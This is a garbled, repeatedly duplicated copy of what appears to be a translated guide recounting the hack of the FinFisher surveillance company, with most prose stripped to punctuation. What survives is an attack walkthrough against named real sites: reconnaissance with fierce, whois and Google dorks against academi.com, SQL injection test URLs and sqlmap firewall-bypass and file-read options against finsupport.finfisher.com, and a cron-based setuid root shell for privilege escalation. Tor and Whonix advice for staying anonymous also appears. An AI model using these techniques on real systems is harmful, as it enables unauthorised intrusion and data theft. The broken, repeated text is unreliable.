-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (     77.69.140.194)   22, 53, 80, 443, 4111 (  -   ). 
 
     : 
 
   40            Skype (, ,  , ,  )      (email, , VoIP)     -                          (Windows, Mac OSX  Linux) 
 
        ,   FinFisher     .     ,       ,        . 
 
       .      ,    -     -.               . 
 
        . 
 
     
 
 ,    - - ,       : 
 
          Truecrypt 7.1a .     Whonix .     Debian,           Tor.    ,  Whonix       Tor,  - ,        -.         aircrack-ng  reaver,     cantenna. 
 
          Whonix,    - ,      ,              ,   -    .      -      . 
 
 : ,        Tor.    ,   -,      -     nmap, sqlmap  nikto,       ,  Tor   .           VPS.     Tor      , ,   ,     . 
 
   
 
      fierce ,       whois-  IP-   . 
 
       Blackwater.     -     (academi.com).   : 
 
 fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com 
 
   whois-   www.academi.com      ,     Amazon Web Service. 
 
 NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd 
 
 whois-  academi.com  ,        ( 850 Puddin Ridge Rd ),        whois-. ,         ,      Google: 
 
 "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools 
 
    IP-,   fierce.pl    ,  fierce.pl -dns -    IP-.      ,     ,   . 
 
     Google       . ,  academi.com    , -    : 
 
 54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com 
 
   whois-    ,  academiproshop.com     ,       . 
 
   FinFisher    finsupport.finfisher.com    whois-  finfisher.com ,       " FinFisher GmbH ".  "FinFisher GmbH" inurl:domaintools  gamma-international.de ,    finsupport.finfisher.com . 
 
  ,     . ,      ,    ,    ,       . 
 
    
 
  nmap-   IP-      .         SNMP-. 
 
       : 
 
     -,    ?    ,    ,    ,    URL  IP     .    fierce    git-,    git.companyname.come/gitweb/        .    ? ,   FTP-,            .        .    (VOIP-, IP-, ...)       .          ? 
 
 -    .  ,  ,  nmap    ,    : 
 
   -.   fierce ,       ,  test.company.com  dev.company.com    ,     .  nikto .      webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php       . ,     .    WhatWeb .         ,  wpscan , CMS-Explorer  Joomscan .    ,         .    ,    .  - -      ,    ,    .         ZAP       .           .    ,       .   ,   .         ,       ,       ( ),   Google     ,         . 
 
  finsupport.finfisher.com   : 
 
    nikto .   .   .     SQL-.  WhatWeb     . WhatWeb   ,   ,    , -  ,   Gamma    ,    ?     ,   URL,     ( index.php ,   ,   ).   Scripts/scripts.js.php    Google: allinurl:"Scripts/scripts.js.php" ,    ,    ,    -. ,      ,        .            . 
 
        ,     - : "   ,      -    ,     Gamma Group... " 
    ,     ,    ,   .    : 
 
     Google: allinurl:"Scripts/scripts.js.php" ,     SQL-   ,   . ,  -  Apache ModSecurity ,    sqlmap   --tamper='tamper/modsecurityversioned.py'     ,   ,  PHP- (          JavaScript-)     -. 
 
   , ,          . 
 
      .     : , LFI,      JavaScript-,      -           Location,                 . 
 
    finsupport .    /BackOffice/  403 Forbidden ,           SQL- (    ).         print.php ,      
 
 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 
 
   ,  print.php   ,    .         !   MySQL       . ,      magicquotes ,         MySQL- INTO OUTFILE .     ,   sqlmap --file-read    PHP-   URL      -,   HTML-,         PHP-    HTML-,     . 
 
   ,  ,       ,        .           ,        . 
 
   (  ) 
 
 ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^ 
 
   root  50% Linux-         : Linux_Exploit_Suggester  unix-privesc-check . 
 
  finsupport     Debian,        ,  unix-privesc-check : 
 
 WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer 
 
  /etc/cron.hourly/webalizer    : 
 
 chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell 
 
  ,  ... . ,   cron       .     webalizer ,  ,      . ,      cron     ,      ,         cron . ls -l /etc/localtime ,     6- ,     webalizer   ,  , ,     .    , ,    , -   ,       ,   . Root-     ,       . 
 
   
 
      ,     .           ,   ,         .       nmap    .     nse-   nfs-*   smb-* .       finsupport -    -,   qateam ,        . 
 
  
 
   ,      .   .      .   : 
 
  Gamma      FinSpy          FinSpy C&C  ,     C&C -         ,   ,        C&C -  FinFisher     C&C -    DDoS- Gamma Group . 
 
    Gamma      ,      ,      FinSpy ,     ,   ,        ,           Twitter-. 
 
 :       ,     GPU   FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 )   ,       ! 
 
   
 
    ,          ,   ,    .    ,    . 
 
 1)   -, Java , Flash  Microsoft Office      email-,            .   ,            / Java / Flash . 
 
      ,   ,      ,     0day-    FinSploit  VUPEN ,   .            -,       .   Metasploit-browser autopwn -, ,  ,       ,    Flash -. 
 
 2)  ,   95%   ,    .        : " ".      ,        ,      ,    . 
 
  
 
       40        .   ,     PGP-  ,      .           GitHub,    : https://github.com/FinFisher . 
 
  : 
 
 Hacker News Reddit 
 
   
 
 https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (    ) https://www.corelan.be/ (  Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/ 
 
 : 
 
 The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated 

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (     77.69.140.194)   22, 53, 80, 443, 4111 (  -   ). 
 
     : 
 
   40            Skype (, ,  , ,  )      (email, , VoIP)     -                          (Windows, Mac OSX  Linux) 
 
        ,   FinFisher     .     ,       ,        . 
 
       .      ,    -     -.               . 
 
        . 
 
     
 
 ,    - - ,       : 
 
          Truecrypt 7.1a .     Whonix .     Debian,           Tor.    ,  Whonix       Tor,  - ,        -.         aircrack-ng  reaver,     cantenna. 
 
          Whonix,    - ,      ,              ,   -    .      -      . 
 
 : ,        Tor.    ,   -,      -     nmap, sqlmap  nikto,       ,  Tor   .           VPS.     Tor      , ,   ,     . 
 
   
 
      fierce ,       whois-  IP-   . 
 
       Blackwater.     -     (academi.com).   : 
 
 fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com 
 
   whois-   www.academi.com      ,     Amazon Web Service. 
 
 NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd 
 
 whois-  academi.com  ,        ( 850 Puddin Ridge Rd ),        whois-. ,         ,      Google: 
 
 "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools 
 
    IP-,   fierce.pl    ,  fierce.pl -dns -    IP-.      ,     ,   . 
 
     Google       . ,  academi.com    , -    : 
 
 54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com 
 
   whois-    ,  academiproshop.com     ,       . 
 
   FinFisher    finsupport.finfisher.com    whois-  finfisher.com ,       " FinFisher GmbH ".  "FinFisher GmbH" inurl:domaintools  gamma-international.de ,    finsupport.finfisher.com . 
 
  ,     . ,      ,    ,    ,       . 
 
    
 
  nmap-   IP-      .         SNMP-. 
 
       : 
 
     -,    ?    ,    ,    ,    URL  IP     .    fierce    git-,    git.companyname.come/gitweb/        .    ? ,   FTP-,            .        .    (VOIP-, IP-, ...)       .          ? 
 
 -    .  ,  ,  nmap    ,    : 
 
   -.   fierce ,       ,  test.company.com  dev.company.com    ,     .  nikto .      webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php       . ,     .    WhatWeb .         ,  wpscan , CMS-Explorer  Joomscan .    ,         .    ,    .  - -      ,    ,    .         ZAP       .           .    ,       .   ,   .         ,       ,       ( ),   Google     ,         . 
 
  finsupport.finfisher.com   : 
 
    nikto .   .   .     SQL-.  WhatWeb     . WhatWeb   ,   ,    , -  ,   Gamma    ,    ?     ,   URL,     ( index.php ,   ,   ).   Scripts/scripts.js.php    Google: allinurl:"Scripts/scripts.js.php" ,    ,    ,    -. ,      ,        .            . 
 
        ,     - : "   ,      -    ,     Gamma Group... " 
    ,     ,    ,   .    : 
 
     Google: allinurl:"Scripts/scripts.js.php" ,     SQL-   ,   . ,  -  Apache ModSecurity ,    sqlmap   --tamper='tamper/modsecurityversioned.py'     ,   ,  PHP- (          JavaScript-)     -. 
 
   , ,          . 
 
      .     : , LFI,      JavaScript-,      -           Location,                 . 
 
    finsupport .    /BackOffice/  403 Forbidden ,           SQL- (    ).         print.php ,      
 
 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 
 
   ,  print.php   ,    .         !   MySQL       . ,      magicquotes ,         MySQL- INTO OUTFILE .     ,   sqlmap --file-read    PHP-   URL      -,   HTML-,         PHP-    HTML-,     . 
 
   ,  ,       ,        .           ,        . 
 
   (  ) 
 
 ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^ 
 
   root  50% Linux-         : Linux_Exploit_Suggester  unix-privesc-check . 
 
  finsupport     Debian,        ,  unix-privesc-check : 
 
 WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer 
 
  /etc/cron.hourly/webalizer    : 
 
 chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell 
 
  ,  ... . ,   cron       .     webalizer ,  ,      . ,      cron     ,      ,         cron . ls -l /etc/localtime ,     6- ,     webalizer   ,  , ,     .    , ,    , -   ,       ,   . Root-     ,       . 
 
   
 
